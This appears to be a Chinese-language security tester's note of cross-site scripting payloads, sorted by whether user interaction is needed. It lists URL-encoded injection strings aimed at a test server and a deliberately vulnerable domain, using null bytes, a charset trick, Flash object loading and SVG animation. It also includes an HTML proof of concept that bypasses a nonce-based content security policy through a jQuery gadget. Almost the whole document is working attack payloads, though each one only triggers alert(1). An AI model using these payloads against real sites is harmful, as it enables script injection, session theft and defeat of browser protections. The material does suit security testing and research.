测试版本:

测试环境:

不需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

CSP bypass via jQuery Gadget

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';">
<script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script>
<script nonce=random>
$(document).ready(function(){
    // code taken from http://api.jquery.com/after/
    $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
XSS XSS XSS
<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>
XSS XSS XSS
<p class="container"></p>
</body>
</html>

需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C